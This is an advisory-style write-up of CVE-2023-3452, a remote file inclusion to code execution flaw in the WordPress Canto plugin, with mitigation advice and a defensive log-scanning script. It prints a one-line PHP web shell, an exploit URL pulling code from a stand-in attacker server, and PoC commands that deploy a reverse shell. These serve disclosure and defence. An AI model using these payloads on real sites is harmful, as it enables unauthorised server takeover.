# CVE-2023-3452: Remote File Inclusion to Remote Code Execution in WordPress Canto Plugin (≤ 3.0.4)

## Summary

A critical vulnerability, identified as CVE-2023-3452, affects versions of the WordPress Canto plugin up to 3.0.4. The flaw arises from a lack of input validation in the `wp_abspath` parameter in the `includes/lib/download.php` file. If the PHP directive `allow_url_include` is enabled, this allows unauthenticated attackers to perform Remote File Inclusion (RFI), which can be escalated to Remote Code Execution (RCE).
## Technical Details

### Vulnerable Code

The following line in the plugin's `download.php` file is the root of the issue:

```php
require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');
```

No sanitization or validation is applied to the `wp_abspath` parameter, allowing remote URLs to be included if `allow_url_include` is set to `On`.
### Exploitation Scenario

An attacker can prepare a remote PHP file (e.g., `admin.php`) containing arbitrary code such as:

```php
<?php system($_GET['cmd']); ?>
```

They can then send a request like:

```
http://victim-site.com/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://attacker-server.com&cmd=whoami
```
This causes the victim's server to fetch and execute the remote file, effectively running the attacker's commands.
## Proof-of-Concept (PoC)

A Python exploit script is available on GitHub (by leoanggal1), which:
- Hosts a local HTTP server to serve the malicious PHP file.
- Sends the RFI payload to the target.
- Allows execution of system commands or deployment of a PHP reverse shell.
### Example Usage

```bash
# Run a simple command via web shell
python3 CVE-2023-3452.py \
  -u http://victim-site.com \
  -LHOST attacker-ip \
  -c 'id'

# Upload a PHP reverse shell and wait for callback
python3 CVE-2023-3452.py \
  -u http://victim-site.com \
  -LHOST attacker-ip \
  -NC_PORT 4444 \
  -s php-reverse-shell.php
```
## Prerequisites for Exploitation

- The server must have `allow_url_include = On` in its PHP configuration.
- The attacker needs a publicly accessible HTTP server to host the malicious PHP code.
## Severity

- CVSS v3.1 Score: 9.8 (Critical)
- Attack Vector: Remote
- Authentication Required: No
- Impact: Full RCE
## Mitigation

- Update the Canto plugin to version 3.0.5 or later, which patches the vulnerability.
- Disable `allow_url_include` in the PHP configuration:

```ini
allow_url_include = Off
```

- Audit all plugin code for any unsanitized usage of `require`, `include`, or their variants using user-supplied input.
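A defender-side log check for the request pattern this advisory describes, added here as an example and not part of the original advisory or the Canto plugin: it scans web-server access logs for requests to the vulnerable `download.php` whose `wp_abspath` parameter carries a URL or PHP stream wrapper (covering the wrappers `allow_url_include` enables, not only the `http://` case above, and undoing double percent-encoding). The log lines are constructed samples in Apache/nginx combined format; the regex, the wrapper list and the helper names are my own assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines in Apache/nginx "combined" format; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Aug/2023:10:01:02 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://198.51.100.9&cmd=whoami HTTP/1.1" 200 512 "-" "curl/8.1.0"
192.0.2.5 - - [12/Aug/2023:10:01:05 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=/var/www/html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.6 - - [12/Aug/2023:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.8 - - [12/Aug/2023:10:02:11 +0000] "GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=%2568ttp%253A%252F%252F198.51.100.9%252Fx HTTP/1.1" 500 300 "-" "python-requests/2.31.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = "/wp-content/plugins/canto/includes/lib/download.php"
# PHP stream wrappers through which require_once can pull in non-local code once
# allow_url_include=On (assumed list). A plain filesystem path has no scheme at all.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "data", "php", "expect"}


def is_remote_include(value):
    """True when a wp_abspath value names a URL/stream wrapper rather than a local path."""
    decoded = unquote(unquote(value)).strip().lower()  # undo double percent-encoding
    scheme, sep, _ = decoded.partition(":")
    return bool(sep) and scheme in REMOTE_SCHEMES


def scan_log(text):
    """Return one finding per request that reached download.php with a remote wp_abspath."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != VULN_PATH:
            continue
        # parse_qs decodes one layer of percent-encoding; is_remote_include handles a second.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("wp_abspath", []):
            if is_remote_include(value):
                findings.append({
                    "ip": m.group("ip"), "time": m.group("ts"),
                    "status": int(m.group("status")),
                    "wp_abspath": unquote(unquote(value)),
                })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Because the vulnerable line reads `$_REQUEST`, the parameter can also arrive in a POST body or cookie, which access logs do not record; treat this as a log-review aid alongside the plugin update, not as a substitute for it.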
## Conclusion

CVE-2023-3452 is a critical vulnerability in the Canto plugin for WordPress. It results from insecure use of dynamic file inclusion based on user input, compounded by risky PHP configurations. Exploitation can lead to full remote code execution without authentication. It is essential for administrators to patch affected systems immediately and ensure server configurations do not allow URL-based file inclusion.